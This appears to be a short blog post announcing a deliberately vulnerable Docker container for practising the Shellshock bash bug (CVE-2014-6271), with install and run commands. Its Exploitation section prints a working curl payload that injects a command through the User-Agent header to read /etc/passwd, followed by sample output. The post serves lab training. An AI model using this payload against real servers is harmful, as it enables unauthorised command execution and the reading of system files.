VaaS - Showcasing CVE 2014-6271 a.k.a. Shellshock

Docker container vaas-cve-2014-6271 released

Posted by Emre Bastuz on July 12, 2015

Overview

For pentesting purposes I have created a Docker container that uses a vulnerable version of bash.

For further details, please see GitHub or simply install the container via the Docker hub.

This docker container is based on Debian Wheezy and has been modified to use a vulernable version of Bash (bash_4.2:2b:dfsg-0.1).

A web application is available via Apache 2 and serves a CGI script which runs shell commands.

Usage

Install the container with docker pull hmlio/vaas-cve-2014-6271

Run the container with a port mapping docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271

You should be able to access the web application at http://your-ip:8080/.

Exploitation

The web application/vulnerable bash version can be exploited as shown below:

# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

Credits

The concept and the web application are heavily inspired by the VulnHub VM "Sokar", created by rasta_mouse. For further details please see https://www.vulnhub.com/entry/sokar-1,113/.